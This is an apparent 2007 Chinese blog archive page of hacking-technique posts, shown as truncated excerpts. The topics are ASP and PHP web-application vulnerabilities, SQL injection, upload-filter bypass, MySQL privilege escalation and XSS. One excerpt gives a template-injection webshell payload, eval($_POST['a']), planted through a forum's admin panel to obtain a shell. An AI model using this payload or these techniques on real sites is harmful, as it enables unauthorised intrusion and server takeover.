您正在查看 "黑客技术/archives" 分类下的文章
2007年04月22日 星期日 17:41
漏洞文件:js.asp
<%
Dim oblog
set oblog=new class_sys
oblog.autoupdate=False
oblog.start
dim js_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
if n=0 then n=1
select case CInt(Request(”j”))
case 1
call tongji()
case 2
call topuser()
case 3
call adduser()
case 4
call listclass()
case 5
call showusertype()
case 6
call listbestblog()
case 7
call showlogin()
case 8 |
2007年04月19日 星期四 18:58
作者:sk@scan-associates.net
来自: http://www.securiteam.com/
翻译:DemonAlex
更新:2006年11月11日
摘要:
下文是为了帮助那些希望能掌握这个漏洞的运用、并想得知如何保护自己免受这种漏洞攻击的人了解该漏 洞的本质而写的。
详细资料:
1.0绪论
当一台机器只开放了80端口(这里指的是提供HTTP服务)时,可能你的大多数漏洞扫描器都不能给到你很多 有价值的信息(漏洞信息),倘 |
2007年04月18日 星期三 18:29
作者: close999
来源:红狼安全小组( www.wolfexp.net, www.crst.com.cn)
原理 : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa
突破的前提条件是 : 服务器是win2003 全功能的空间
**************************************************
'函数名:UserNamefilter(
'作 用:过滤用户名(增强过滤,用户名现 |
2007年04月16日 星期一 19:33
来源:猪猪's blog
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
|
2007年04月16日 星期一 19:31
来源:猪猪's blog
S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?
利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHE |
2007年04月16日 星期一 19:29
信息来源:B.S.T
漏洞平台:SHOPEX
危害程度:★★★★☆
关于ShopEx:
ShopEx是网络购物软件与技术服务全面提供商,ShopEx做为国内购物软件的开拓者和实践者,提供了从购物软件(包括网上商店、网上商城、网上商店多店系统)到相关配套服务(网店推广、模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等)以及深层次的电子商务技术服务。
漏洞原理:
看这里:/shop/npsout_reply.php
include_once($I |
2007年04月16日 星期一 19:22
来源:cnfjhh's blog
Battle.net clan管理系统使用MySQL后端,允许用户方便的升级和维护web站点。
系统实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击,非授权获取系统的管理权限。
Battle.net clan的login.php脚本没有正确地验证通过index.php对user参数的输入:
line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];
.....
.....
.....
line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND pas |
2007年04月14日 星期六 18:46
2007年04月14日 星期六 18:42
作者:樱花浪子[I.S.T]
来源:红狼安全小组( www.wolfexp.net, www.crst.com.cn)
注:本文首发于黑客手册,.转载请注明来源
06年就这样像3389离我而去,07年就像4489在迎接着我们。不知不觉又长了一岁。06年可以说是注入淡却的一年。不过新的技术也在增长。
跨站虽然算不上新的技术。 |
2007年04月08日 星期日 08:22
话说今天早上没去补课(因为不敢去~~考太烂,呵呵),于是游走在本人以前常去的NB打发时间,看到整个NB都把首页设置成了局域网的一个留言板。呵呵,要知道,服务越多,越容易出问题,于是开始了友情检测之旅...
首先来浏览下网站,很简单的结构,入下图:
貌似没有什么可以利用的注入或者爆库,测试了几个弱口令,同样没有收获....
|
|
| 
